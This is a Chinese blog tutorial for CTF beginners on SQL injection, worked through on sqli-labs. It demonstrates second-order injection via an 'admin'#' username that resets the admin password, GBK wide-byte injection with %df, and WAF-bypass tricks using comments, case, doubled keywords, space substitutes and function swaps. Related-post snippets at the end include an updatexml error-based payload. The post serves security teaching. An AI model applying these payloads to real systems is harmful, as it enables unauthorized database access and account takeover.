WEB入门——SQL注入(二)

最新推荐文章于 2024-09-10 09:00:00 发布
最新推荐文章于 2024-09-10 09:00:00 发布
阅读量447 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF入门 文章标签: sql 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HasntStartIsOver/article/details/131024743
本文深入探讨了SQL注入中的二次注入问题,分析了二次注入的原理和步骤,并通过sqli-labs第24题进行实战演示。此外,文章还介绍了宽字节注入,展示了如何利用GBK编码进行注入。在绕过策略部分,详细讲解了包括注释、大小写、双写关联字、空格、特殊符号和函数名在内的多种绕过WAF的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入

一、二次注入

二次注入的起因是数据在第一次入库的时候进行了一些过滤及转义,当这条数据从数据库中取出来在SQL语句中进行拼接,而在这次拼接中没有进行过滤时,就能执行我们构造好的SQL语句了。
在第一次进行数据库插入数据的时候,使用了 addslashes 、get_magic_quotes_gpc、mysql_escape_string、mysql_real_escape_string等函数对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。

二次注入的步骤可以概括为:

  • 第一步:插入恶意数据
    进行数据库插入数据时,对其中的特殊字符进行转义处理,写入数据库的适合又保留了原来的数据。
  • 第二部:引用恶意数据
    开发者默认存入数据库的数据都是安全的,在进行查询时,直接从数据库中取出恶意数据,没有进行进一步的检验的处理。

sqli-labs第24题

在这里插入图片描述
处理注册信息的源码:

if (isset($_POST['submit']))
{
	# Validating the user input........
	//$username=  $_POST['username'] ;
	$username=  mysqli_real_escape_string($con1, $_POST['username']) ;
	$pass= mysqli_real_escape_string($con1, $_POST['password']);
	$re_pass= mysqli_real_escape_string($con1, $_POST['re_password']);

	echo "<font size='3' color='#FFFF00'>";
	$sql = "select count(*) from users where username='$username'";
	$res = mysqli_query($con1, $sql) or die('You tried to be smart, Try harder!!!! :( ');
	$row = mysqli_fetch_row($res);

所有传递的信息都通过了mysqli_real_escape_string函数进行了转义。直接注册一个特殊的普通账户

在这里插入图片描述
注册完成后,查看以下后台数据库表:

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | hi       | 123        |
| 16 | admin'#  | 12345      |
+----+----------+------------+
15 rows in set (0.00 sec)

刚刚注册的用户正好在里面。然后用刚注册的用户名登陆,登录成功后页面显示了用户名。

在这里插入图片描述
试着修改以下密码,然后查看一下数据库表。
在这里插入图片描述

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | hello      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | hi       | 123        |
| 16 | admin'#  | 12345      |
+----+----------+------------+
15 rows in set (0.00 sec)

当前用户的密码没有修改,反倒是把管理员admin的密码进行了修改。
查看一下修改密码的源代码:

if (isset($_POST['submit']))
{
	# Validating the user input........
	$username= $_SESSION["username"];  
	$curr_pass= mysqli_real_escape_string($con1, $_POST['current_password']);
	$pass= mysqli_real_escape_string($con1, $_POST['password']);
	$re_pass= mysqli_real_escape_string($con1, $_POST['re_password']);
	
	if($pass==$re_pass)
	{	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysqli_query($con1, $sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysqli_affected_rows($con1);

可以看到,$username= $_SESSION[“username”]; 在session中获取的用户名为:admin’#。所以将其带入到SQL语句中是:

UPDATE users SET PASSWORD='hello' where username='admin'#' and password='$curr_pass'

所以最终修改的是admin管理员的密码。

二、其他注入

2.1、 宽字节注入

如果数据库使用gbk编码,%df%5c表示的是“連”。

sqli-labs第32题

在这里插入图片描述

  • 使用id=1’ and 1=2 #注入时提示:单引号被转义了’
    在这里插入图片描述
  • 所以在URL编码后的单引号前面添加%df,因为“\”的URL编码是%5c。所以当后台对单引号进行转义时,在数据库显示的是%df%5c(連)。
    在这里插入图片描述
  • 表示已经注入成功了,然后查询数据库名:
    在这里插入图片描述
  • 通过数据库查询所有表名时,因为单引号被转义,该怎么办?
    在这里插入图片描述
  • 可以通过数据库名转换成十六进制,就可以不使用单引号;或者直接使用database()
    在这里插入图片描述
    在这里插入图片描述
    (后续学习了新的注入方式继续总结…)

三、注入绕过

WAF(web应用防火墙),会对每个请求的内容根据生产的规则进行检测并且对不符合安全规则的做出应对的过滤处理,从而保证Web应用的安全性与合法性。

常见的绕过方式有以下几个分类。

3.1 注释绕过

常用的注释符有:

-- 注释内容
# 注释内容
/* 注释内容 */
;

3.2 大小写绕过

比如WAF过滤了and 和AND,但是没有过滤And。或者过滤了select和SELECT,但是没有过滤SelEct

mysql> select * from users WheRe id ='8' limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | hello    |
+----+----------+----------+
1 row in set (0.00 sec)

3.3 双写关联字绕过

在某一些简单的waf中,将关键字and、select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过。例如and变成anandd,在经过waf的处理之后又变成and,达到绕过的要求。

3.4 空格绕过

空格被WAF过滤掉了。可以使用以下方法进行绕过:

  • /**/
  • ()
  • 回车(URL编码中的%0a)
  • `
  • tab
mysql> select   id,username,(password)from`users`Where/**/id='8'limit
    -> 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | hello    |
+----+----------+----------+
1 row in set (0.00 sec)

3.5 绕过and、or、=

  • && 表示 and
  • || 表示 or
  • like 表示 =
mysql> select id,username,password from users where id like '8' || id like '9' ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | hello    |
|  9 | admin1   | admin1   |
+----+----------+----------+
2 rows in set (0.00 sec)

3.6 过滤逗号

  • select substr(‘abc’,1,1);
mysql> select substr('abc',1,1);
+-------------------+
| substr('abc',1,1) |
+-------------------+
| a                 |
+-------------------+
1 row in set (0.00 sec)

mysql> select substr('abc' from 1 for 1);
+----------------------------+
| substr('abc' from 1 for 1) |
+----------------------------+
| a                          |
+----------------------------+
1 row in set (0.00 sec)
  • select 1,2,3;
mysql> select 1,2,3;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a join(select 2)b join (select 3)c;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)
  • select * from users limit 0,1;
mysql> select * from users limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users limit 1 offset 0;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

3.7 函数名绕过

  • sleep() 可以使用benchmark()
mysql> select sleep(6);
+----------+
| sleep(6) |
+----------+
|        0 |
+----------+
1 row in set (6.01 sec)

mysql> select benchmark(2000000000,1);
+-------------------------+
| benchmark(2000000000,1) |
+-------------------------+
|                       0 |
+-------------------------+
1 row in set (6.48 sec)
  • ascii() -> ord()
mysql> select ascii('a');
+------------+
| ascii('a') |
+------------+
|         97 |
+------------+
1 row in set (0.00 sec)

mysql> select ord('a');
+----------+
| ord('a') |
+----------+
|       97 |
+----------+
1 row in set (0.00 sec)

其他的慢慢学习,慢慢总结

Web入门Sql注入()
qq_51459823的博客
11-16 1190
通过触发 SQL 错误来诱导条件响应 在前面的示例中,假设应用程序执行相同的 SQL 查询,但根据查询是否返回任何数据,行为没有任何不同。前面的技术将不起作用,因为注入不同的布尔条件对应用程序的响应没有影响。 在这种情况下,根据注入的条件,通常可以通过有条件地触发 SQL 错误来诱导应用程序返回条件响应。这涉及修改查询,以便在条件为真时会导致数据库错误,但如果条件为假则不会。很多时候,数据库抛出的未处理的错误会导致应用程序的响应(例如错误消息)出现一些差异,从而使我们能够推断注入条件的真实性。 要查看
ctf.show(超详解)——sql注入web171-web182
2201_76115387的博客
07-28 790
sql注入
[第一章 web入门]SQL注入-2
qq_43618536的博客
07-24 1033
[第一章 web入门]SQL注入-2
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 471
此题为 【从0开始学web】系列第一百七十题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
Web编程入门——字节跳动.zip
10-25
除此之外,Web安全知识也不容忽视,如防止SQL注入、XSS跨站脚本攻击和CSRF跨站请求伪造等。此外,了解如何使用HTTPS进行加密通信,保护用户隐私和数据安全,也是现代Web开发者的必备技能。 最后,持续集成/持续部署...
buuctf web入门 sql注入
最新发布
01-24
id=1` 的URL参数,首要任务是确认SQL注入的类型——字符型或数字型。这一步骤至关重要,因为不同类型的注入会影响后续测试方法的选择[^1]。 ```python # 测试数字型注入 http://example.com/page.php?id=1' # 如果...
WEB渗透——新手入门之初级工具利用
01-16
【标题】:“WEB渗透——新手入门之初级工具利用” 【描述】:“WEB渗透—优惠券https://www.panpansq.com—新手入门之初级工具利用”这个描述提到了一个在线资源,可能是提供有关WEB渗透教程的网站,它可能提供了...
[第一章 web入门]SQL注入-2 题目分析与详解
2302_79800344的博客
02-26 1354
一、题目简介。
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 7264
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
[web入门]SQL注入-2
1tachi的博客
12-02 772
请原谅我发出一点不友好的声音: 每个人无论是做完题了,还是没做完题,他只要是想进步,都会搜一下WP,尤其是BUUCTF的WP更有必要搜一下,为的是更标准、更多的思路,不成想我搜索发现,清一色! 思路一摸一样,用的函数一模一样,更甚之有的连思路都没有,上来就报错注入,生怕别人不知道他是抄的wp。。。令人无语! 我写的这个是我自己的思路,权当是留作笔记吧,或者是一点不健康的牢骚。。。 ...
BUUCTF[第一章 web入门]SQL注入-2
hivjianxian的博客
11-22 851
ctf题解
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2
weixin_40872714的博客
03-28 1024
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2 查看html代码,看到有一个提示,说明是要我们报错注入 先抓包,加了tips=1后就会有报错的信息 首先报数据库 note 尝试报表名,出错了,根据错误信息,可能是前面的select被过滤了,这里就是不断尝试,没有什么好的方法 使用双写绕过 获得了关键的fl4g表,flag应该就在这里面 尝试报字段名得到flag字段 直接得到flag ...
web基础之SQL注入
m0_74080781的博客
09-10 857
思路:ctf题目考察这一点的话肯定是从在漏洞的;无须挖掘漏洞!一般过程就是:首先判断数据的传值方式(GET/POST):如果是GET方式直接尝试用sqlmap工具跑;如果能跑出来万事大吉;如果跑不出来具体分析代码;看是否有过滤措施;根据相应的过滤措施制定绕过方法,最终拿到flag;如果是POST传值的话有三种爆破方式"抓包保存为.txt然后使用工具爆破,使用-r参数进行爆破""增加--data参数""使用hackbar插件手工注入
[第一章 web入门]SQL注入-1,[第一章 web入门]SQL注入-2
m0_73721944的博客
11-14 152
得到payload:name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+&pass=1' and 1=2 --+-- 如果觉得太难了,可以在url后加入?id=1 and 1=1--+ 正常。id=1' and 1=1--+ 正常。打开是这样的,很明显在url中存在注入点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值